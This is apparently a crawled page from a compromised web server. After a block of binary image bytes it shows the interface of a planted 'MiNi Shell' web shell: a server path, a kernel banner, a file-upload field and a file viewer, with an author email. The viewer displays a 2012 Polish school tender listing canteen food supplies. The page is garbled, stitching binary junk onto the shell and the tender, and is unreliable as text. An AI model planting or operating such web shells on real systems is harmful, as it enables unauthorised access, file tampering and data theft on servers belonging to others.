JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120829/319792-N-2012.html

<p class="kh_header"><b>Gdynia: dostawa artykułów żywnościowych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 319792 - 2012; data zamieszczenia: 29.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 18 , ul. Krasickiego 28, 81-385 Gdynia, woj. pomorskie, tel. 58 6206943, faks 58 6617655.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp18.gdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: szkoła podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów żywnościowych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> sukcesywna dostawa art.żywnościowych z podziałem na 4 części: 1) art. spożywcze; 1) ryby; 3) warzywa i owoce świeże i mrożone, jaja; 4) świeże dania gotowe.
Szczegółowe zestawienie asortymentowe w załącznikach.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.40.00.00-2, 15.60.00.00-4, 15.20.00.00-0, 15.30.00.00-1, 03.14.25.00-3, 15.89.43.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia na podstawie aktualnych zaświadczeń i oświadczeń</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art 22 PZP spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie art 22 PZP spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art. 22 PZP spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie, że wykonawca posiada stosowne atesty lub zaświadczenia na art. żywnościowe, dopuszczające do spożycia zgodnie z obowiązującymi przepisami</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp18.gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 18  81-385 Gdynia  ul. Krasickiego 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 09:00, miejsce: sekretariat Szkoły Podstawowej nr 18 w Gdyni.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru
	Szacunkowa ilość
1	Mąka pszenna typ 650	140 kg
2	Skrobia ziemniaczana	45kg
3	Makaron świderki 3 kolory, niesklejający się, opakowanie 2-3 kg	110 kg
4	Makaron świderki niesklejający się
Opakowanie2- 3 kg	110 kg
5	Makaron łazanki nie sklejający się
opakowanie 2-5 kg	35 kg
6	Makaron kolanka niesklejający się opakowanie 2-5 kg	25 kg
7	Makaron spaghetti niesklejający się opakowanie 2-5 kg	150kg
8	Makaron nitka niesklejający się
Opakowanie2- 5 kg	75 kg
9	Makaron, piórka niesklejający się 
opakowanie 2-5 kg	180 kg
10	Makaron gwiazdki niesklejający się opakowanie2- 5 kg	10 kg
11	Makaron kokardki niesklejający się opakowanie 2-5 kg	10 kg
12	Kasza jęczmienna wiejska opakowanie 1 kg	30 kg
13	Kasza pęczak opakowanie  1 kg	120 kg
14	Kasza gryczana prażona, opakowanie 5 kg	280 kg
15	Kasza jaglana, opakowanie 400 g	10 kg
16	Przyprawa do wieprzowiny op nie mniejsze niż 500 g	 8 szt
17	Kwasek cytrynowy, opakowanie 500 g	2 kg
18	Cukier  biały kryształ 1 kg	250 kg
19	Ryż długoziarnisty biały	30 kg
20	Ryż preparowany termicznie
zapewniający sypkość po ugotowaniu	400 kg
21	Tymianek zioła suszone 100% op. nie mniej niż100g 	1kg
22	Bazylia, zioła suszone100%
opakowanie nie mniej niż 100g	1kg
23	Zioła prowansalskie suszone   100%
opakowanie nie mniej niż 100g	1kg
24	Pieprz czarny mielony
opakowanie nie mniej niż 500 g	5kg
25	Papryka słodka mielona
opakowanie nie mniej niż 500g	3 kg
26	Majeranek, zioła suszone 100%
opakowanie nie mniej niż 200g	3 kg
27	Sól spożywcza jodowana opakowanie 1 kg	150 kg
28	Oregano ,zioła  suszone 100%
opakowanie nie mniej niż 100g	2 kg
29	Musztarda zwykła , słoik 200g	40 szt
30	Majonez, słoik 700 g	30 szt
31	Żur w butelce 0,5 l	50 szt
32	Czosnek granulowany
opakowanie nie mniej niż 500g	4 szt
33	Przyprawa magi 1 L	60 L
34	Olej rzepakowy z pierwszego tłoczenia 5L	520 L
35	Oliwa 1 L	15 L
36	Przyprawa do drobiu - sypka , opakowanie 600g	8 szt
37	Marynata do mięsa wieprzowego sypka
opakowanie nie mniej niż 500g	6 szt
38	Sos pieczarkowo-borowikowy
opakowanie nie mniej niż 250g	13 szt
39	Sos sałatkowy, opakowanie nie mniej niż 250g	6szt
40	Sos myśliwski ,opakowanie nie mniej niż 250g	13 szt
41	Sos bolonesse, opakowanie nie mniej niż 250g	18 szt
42	Liść laurowy	1 kg
43	Ziele angielskie	1 kg
44	Cynamon opakowanie 20 g	30 szt
45	Bułka tarta 100% suchego pieczywa	130 kg
46	Bulion grzybowy instant , opakowanie 1 kg	4 kg
47	Syrop do rozcieńczenia butelka 680 ml	900 szt
48	Rosół z kury instant , opakowanie nie mniej nie 250g	6 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.40.00.00-2, 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa ryb świeżych i mrożonych do stołówki szkolnejIII. ZESTAWIENIE ASORTYMENTOWE
LP	Nazwa i opis artykułu	Szacunkowa ilość
1	Kostka z łososia panierowana mrożona	120 kg
2	Stek z łososia panierowany mrożony	120 kg
3.	Kostka z dorsza panierowana mrożona	160 kg
4	Filet z flądry świeży bez skóry	120 kg
5.	Filet z dorsza świeży bez skóry	 280 kg
6	Filet z flądry bez skóry mrożony	280 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> warzywa i owoce świeże i mrożone oraz jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> warzywa/owoce świeże i mrożone oraz jaja 
II. zestawienie asortymentowe- warzywa i owoce
                                                          

Lp	Nazwa artykułu	       
Ilość	
j.m
1	Ziemniaki	7000	kg
2	Ziemniaki młode	230	kg
3	Marchew	380	kg
4	Pietruszka korzeń	50	kg
5	Seler	50	kg
6	Pietruszka zielona-natka świeża,
pęczek od 30 g	100	szt
7	Pietruszka natka suszona
opakowanie nie mniej niż 100g	2	kg
8	Koper świeży, 
pęczek od 30g	160	szt
9	Cytryny	15	kg
10	Cebula żółta	110	kg
11	Kapusta biała	110	kg
12	Kapusta pekińska	160	szt
13	Kapusta kiszona op 10 kg	480	kg
14	Kapusta czerwona	270	kg
15	Kapusta włoska	60	kg
16	Ogórek kiszony	390	kg
17	Ogórek świeży szklarniowy	200	kg
18	Por	20	kg
19	Salata lodowa	200	szt
20	Kalafior świeży duży	30	szt
21	Pomidory I gat, duże	90	kg
22	Papryka czerwona	40	kg
23	Jabłka duże	70	kg
24	Banany	270	kg
24	Szczypior  gruby, pęczek	30	szt
25	Buraki	200	kg
26	Fasola średni Jaś	130	kg
27	Groch łuskany	100	Kg

28	Koncentrat pomidorowy 30%
opakowanie szklane 1L	130	szt
29	Soczek  owocowy 
kartonik z słomką 0,2L	7000	szt
30	Soczek owocowy 
 butelka plastikowa  0,3 L	2400	szt
31	Mandarynka	60	kg
32	Surówki warzywne op 3 kg	800	kg
33	Szczaw w  słoiku 380g	110	szt
34	Pieczarki	260	kg
35	Kukurydza puszka 400g	60	szt
36	Chrzan słoik 290g	80	szt
37	Rodzynki
opakowanie 1kg	3	kg
38	Koncentrat barszczu w płynie
butelka 0,33L	15	szt
39	Jabłka prażone opakowanie
5-10 kg	180	kg
40	Jaja świeże kl A rozm L z chowu klatkowego	2500	szt
41	Kapusta  młoda sezonowa	170	kg
42	Ogórek świeży gruntowy	80	kg
43	Gruszki	30	kg
44	Cebula czerwona	30 	kg
45	Sałatka z ogórków świeżych słodko-kwaśna słoik 600-900g	50	Szt 

Zestawienie asortymentowe -warzywa i owoce mrożone


Lp	Nazwa  artykułu	Ilośś	jm
1	Fasola szparagowa zielona cięta opakowanie 2,5 kg	130	kg
2	Fasola szparagowa  zielona cała opakowanie 2,5 kg	60	kg
3	Barszcz ukraiński opakowanie 2,5 kg	60	kg
4	Włoszczyzna 
4-składnikowa
opakowanie 2,5 kg	700	kg
5	Marchew kostka
opakowanie 2,5 kg	120	kg
6	Marchew mini
opakowanie 2,5 kg	110	kg
7	Marchew z groszkiem
opakowanie 2,5kg	180	kg
8	Groszek zielony
opakowanioe2,5kg	30	kg
9	Brokuły
opakowanie 2,5kg	180	kg
10	Brukselka
opakowanie 2,5kg	40	kg
11	Kalafior
opakowanie 2,5kg	120	kg
12	Czarna porzeczka
opakowanie nie mniej 
 niż 2 kg	30	kg
13	Malina
opakowanie nie mniej
 niż 2kg	30	kg
14	Miks z papryki (3 kolory)	30	kg
15	Wiśnia drylowana
opakowanie nie mniej niż 2kg	70	kg
16	Śliwka drylowana
opakowanie nie mniej niż 2kg	70	kg
17	Truskawka
opakowanie nie mniej niż 2kg	180	kg
18	Mieszanka kompotowa
opakowanie nie mniej niż 2kg	60	kg
19	Marchew plastry
opakowanie 2,5 kg	80	kg
20	Papryka czerwona
opakowanie nie mniej niż 2kg	50	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> świeże dania gotowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> świeże dania gotowe  
II. Zestawienie asortymentowe  - ŚWIEŻE DANIA GOTOWE
Lp	Nazwa towaru	Szacunkowa ilość
1	Pierogi leniwe	500 kg
2	Pierogi z kapustą i grzybami	210 kg
3	Pierogi z mięsem	160 kg
4	Pierogi z serem	470 kg
5	Pierogi ruskie	160 kg
6	 Naleśniki z serem	480 kg
7	Naleśniki z kapustą i grzybami	230  kg
8	Krokiety z kapustą( 100g/szt)	1500 szt
9	Krokiety z mięsem (100g/szt)	1500 szt
10	 Gołąbki (100g/szt)	500 kg
11	Kotlety drobiowe typu Devolai( 100g/szt)	120 kg
12	Pyzy z mięsem	140 kg
13	kartacze	140 kg
14	kołduny	200 kg
15	kopytka	200 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.43.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com